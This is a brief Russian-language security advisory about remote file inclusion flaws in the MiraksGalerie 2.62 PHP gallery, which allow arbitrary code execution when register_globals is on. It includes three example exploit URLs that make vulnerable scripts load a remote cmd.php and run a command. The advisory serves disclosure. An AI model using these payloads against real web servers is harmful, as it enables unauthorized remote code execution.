Программа: MiraksGalerie 2.62, возможно другие версии.

Уязвимость позволяет удаленному пользователю выполнить произвольный код на целевой системе. Уязвимость существует из-за недостаточной обработки входных данных в параметре "g_pcltar_lib_dir" в сценарии pcltar.lib.php (требует наличие включенной опции "register_globals"), и в параметре "listconfigfile[]" в сценарии galsecurity.lib.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена.

Пример:

http://example/[mg_path]/pcltar.lib.php?g_pcltar_lib_dir=http://example/cmd.php?exec=uname
http://example/[mg_path]/galimage.lib.php?listconfigfile[0]=http://example/cmd.php?exec=uname
http://example/[mg_path]/galsecurity.lib.php?listconfigfile[0]=http://example/cmd.php?exec=uname
 



Оставить мнение